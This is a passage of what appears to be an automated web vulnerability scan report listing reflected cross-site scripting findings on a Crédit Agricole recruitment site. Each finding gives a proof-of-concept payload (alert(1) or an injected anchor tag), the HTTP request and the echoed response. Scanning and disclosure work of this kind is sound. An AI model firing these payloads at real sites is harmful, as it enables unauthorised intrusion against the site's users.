var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.88. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_recruitment.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6ea5"-alert(1)-"d5aa454ad92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_recruitment.php?b6ea5"-alert(1)-"d5aa454ad92=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:02 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:02 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
icole Recruitment Group";
var SharingBaseTitle = "Recruitment - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_recruitment.php?b6ea5"-alert(1)-"d5aa454ad92=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.89. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_recruitment.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7db"><a>10865c1fb0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_recruitment.php?9b7db"><a>10865c1fb0f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:37 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:37 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_recruitment.php?9b7db"><a>10865c1fb0f=1" />
...[SNIP]...

1.90. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_remuneration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 899af"><a>a74135578ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_remuneration.php?899af"><a>a74135578ff=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Remuner
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_remuneration.php?899af"><a>a74135578ff=1" />
...[SNIP]...

1.91. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_remuneration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88bb6"-alert(1)-"9f80076c8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_remuneration.php?88bb6"-alert(1)-"9f80076c8f4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:05 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:05 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Remuner
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Remuneration - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_remuneration.php?88bb6"-alert(1)-"9f80076c8f4=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.92. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 585ed"><a>0b0d2ff5e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.php?585ed"><a>0b0d2ff5e91=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/index.php?585ed"><a>0b0d2ff5e91=1" />
...[SNIP]...

1.93. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79244"-alert(1)-"970a6abbe6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php?79244"-alert(1)-"970a6abbe6a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:44 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:44 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
ngBaseTitle = "Recruitment and employment opportunities in banking, finance and insurance professions - Cr..dit Agricole Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/index.php?79244"-alert(1)-"970a6abbe6a=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.94. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /innovation.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29274"-alert(1)-"3567013046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /innovation.php?29274"-alert(1)-"3567013046f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:08 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:08 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Innovat
...[SNIP]...
nnovation - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Innovation - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/innovation.php?29274"-alert(1)-"3567013046f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.95. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /innovation.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8989"><a>05bc715427c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /innovation.php?b8989"><a>05bc715427c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:42 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:42 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Innovat
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/innovation.php?b8989"><a>05bc715427c=1" />
...[SNIP]...

1.96. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /jeunes_diplomes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e1e"-alert(1)-"3c889b37878 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jeunes_diplomes.php?91e1e"-alert(1)-"3c889b37878=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:22 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:22 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
..dit Agricole Recrutement";
var SharingBaseTitle = "Espace Jeunes Dipl..m..s - Groupe Cr..dit Agricole Recrutement";
var SharingUrl = "http://www.recrutement.credit-agricole.com/jeunes_diplomes.php?91e1e"-alert(1)-"3c889b37878=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.97. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /jeunes_diplomes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef3c"><a>779b06646e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jeunes_diplomes.php?6ef3c"><a>779b06646e0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:00 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:00 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/jeunes_diplomes.php?6ef3c"><a>779b06646e0=1" />
...[SNIP]...

1.98. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a7e"><a>cf4ba7c431c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news.php?70a7e"><a>cf4ba7c431c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 94489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>News -
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/news.php?70a7e"><a>cf4ba7c431c=1" />
...[SNIP]...

1.99. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc5d2"-alert(1)-"0301e223885 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news.php?dc5d2"-alert(1)-"0301e223885=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 94510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>News -
...[SNIP]...
SharingTitle = "News - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "News - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/news.php?dc5d2"-alert(1)-"0301e223885=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.100. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /search_result.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea2bf"-alert(1)-"bc55bac250f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search_result.php?ea2bf"-alert(1)-"bc55bac250f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:08 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:05:08 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 50790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Search
...[SNIP]...
ult - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Search result - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/search_result.php?ea2bf"-alert(1)-"bc55bac250f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.101. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /search_result.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d62"><a>cb51436b59a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search_result.php?a6d62"><a>cb51436b59a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:40 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 50769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Search
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/search_result.php?a6d62"><a>cb51436b59a=1" />
...[SNIP]...

1.102. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /sitemap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57da5"><a>c60d3a2d76e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap.php?57da5"><a>c60d3a2d76e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 58992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/sitemap.php?57da5"><a>c60d3a2d76e=1" />
...[SNIP]...

1.103. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /sitemap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e4f"-alert(1)-"8ceaf077820 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.php?d2e4f"-alert(1)-"8ceaf077820=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:00 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:05:00 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
